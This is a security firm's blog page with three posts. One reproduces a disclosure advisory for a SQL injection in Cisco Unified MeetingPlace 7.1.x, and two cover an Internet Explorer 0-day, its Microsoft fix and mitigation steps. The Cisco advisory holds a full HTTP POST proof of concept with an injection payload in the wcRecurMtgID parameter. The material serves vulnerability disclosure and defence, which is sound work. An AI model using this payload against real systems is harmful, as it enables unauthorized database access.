Insinuator


Some outright rants from a bunch of infosec practitioners.

TAG | advisory

Nov/12

8

SQL Injection in Cisco MeetingPlace

Cisco has released a security advisory for a vulnerability we discovered last year.
For comparison here is our original advisory to cisco:

Security Advisory for Cisco Unified Communications Solution
Release Date: 11/8/2012
Author: Daniel Mende
1 SUMMARY
Multiple critical SQL injections exist in Cisco unified meeting place.
2 AFFECTED PRODUCTS
The following Products have been tested as vulnerable so far:
Cisco Unified Meetingplace with the following modules:
• MeetingPlace Agent 7.1.1.9
• MeetingPlace Audio Service 7.1.1.8
• MeetingPlace Gateway SIM 7.1.1.2
• MeetingPlace Replication Service 7.1.1.9
• MeetingPlace Master Service 7.1.1.8
• MeetingPlace Extension 7.1.1.8
• MeetingPlace Authentication Filter 7.1.1.8
3 DETAILS
The following parameters are affected:
http://$IP/mpweb/scripts/mpx.dll [POST Parameter wcRecurMtgID]
4 VULNERABILITY SCORING
The severity rating based on CVSS Version 2:
Base Vector: (AV:N / AC:L / Au:S / C:P / I:P / A:P)
CVSS Version 2 Score: 6.5
Severity: Low
5 PROOF OF CONCEPT
POST /mpweb/scripts/mpx.dll HTTP/1.1
Host: 10.X.X.X
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.X.X.X/mpweb/scripts/mpx.dll
Cookie: cookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 571
SessionID=A40490A1-AB17-4C1E-BA4A-E3C5C90F62CA.1ED59E5C-A774-4546-8683-
AEB15D6FBD0D.55931857-6296-48ec-9434-3231c683c47d.ADadfjadlkeNmFhmplaihgkdDg
&wcMeetingID=&wcRecurMtgID=‘ or 1=1 –&URL0=wcBase.tpl&TXT0=Startseite&URL1=&
TXT1=&URL2=&TXT2=&URL3=&TXT3=&URL4=&TXT4=&URL5=&TXT5=&MtgCatToSearch=
%28all%2Bcategories%29&ML_PublicPosted=Yes&MtgIDToSearch=0000007&SchedulerID=
&wcRequest=&wcHash=&FormType=listmeetings&wcState=3&STPL=wcFindMtg.tpl&FTPL=
wcFindMtg.tpl&ML_List=MT_Today&ML_EndTime_Month=&ML_EndTime_Day=&ML_End
Time_Year=&ML_ShowContMtgs=Yes&SP_VLanguage=lang999i00

 

As we are at the topic of Cisco’s Unified Communications Solution, there is a lot more in the queue to come up, just be patient a little longer, it’ll be worth it (-;

 

cheers

/daniel

, , , | Post your comment here.

Microsoft takes this vulnerability quite serious and was acting fast. The Microsoft Security Response Center announced the availability of a fix last night in the MSRC Blog.

The fix will be available via Windows Update on friday, the 21st of september. So it’s time to get ready for this update ;-).

Have a nice day
Michael

| Post your comment here.

Actually a Windows Vulnerability (Microsoft Advisory 2757760) related to the Internet Explorer Version 7, 8 and 9 is in the news. Microsoft is aware of the problem, but there’s no patch available yet. We call this a 0-Day :-). Making the problem even worse, on monday reliable exploit code was released within the Metasploit project, so exploit code is already in the wild.

Basically Microsoft suggests two workarounds:

But both of them have some impact: EMET must be deployed before any usage (btw. EMET can be configured via Group Policies) and disabling Active X and Active Scripting might break some business relevant web sites (that can be added to the “Trusted Sites” Zone, but might produce major operational effort).

There are more possible mitigating controls, so let’s just summarize some ideas:

  • Use of alternative browser: if you have it deployed already, go for it :-). Otherwise we have the same deployment issue as with EMET.
  • Sandboxing/Application Virtualization: It’s the same as with the alternate browser, of you have it, go for it, otherwise it will be a long term project. And be aware that also Application Virtualization won’t address all issues (see the ERNW Newsletter 32 for details).
  • No local admin rights: This doesn’t protect from exploiting the vulnerability, but at least reduces the impact. We strictly recommend to check the local administrator group and remove all users that don’t rely on it for fulfilling their business tasks. And btw. this topic is not new ;-), see also ERNW Newsletter 4, published in 2004!
  • Blocking communication for the clients at the corporate firewall: Be aware that this doesn’t really work. Modern exploit code is able to use the corporate proxy infrastructure including authentication to circumvent this control. Metasploit has exploit payloads for this.
  • Disabling/Blocking Flash content: While potentially not strictly required for exploitation, at least in some of the exploits currently observed in the wild Adobe Flash plays a major role. So like discussed in  these Insinuator posts (1, 2 and 3), restricting the use of Adobe Flash would proactively prevent some known exploits from working. But the newly published Metasploit exploit doesn’t use Flash, so keep  in mind that this mitigating control can only be used in addition to other ones.

So for a short term mitigation we recommend the following (especially for corporate environments)

  1. Disabling Active X and Active Scripting via Group Policies
  2. Disable/block Flash content
  3. Remove unneeded local administrative privileges
  4. If available use alternative browser or EMET

For long term mitigation (might also be feasible in small environments as short term mitigation):

  1. Deploy EMET
  2. Evaluate possibilities of application sandboxing/virtualization
  3. Deploy alternative browser. Be aware that deploying a second browser might not be an option for big corporate environments (central management and supporting/maintaining additional software are the main reasons for this).

And finally DON’T PANIC ;-), start to address the problem in a professional way.

Hope that helps a bit
Michael

, , , , | Post your comment here.

Contact


Mail | Twitter | Imprint

©2010-2013 ERNW GmbH
To top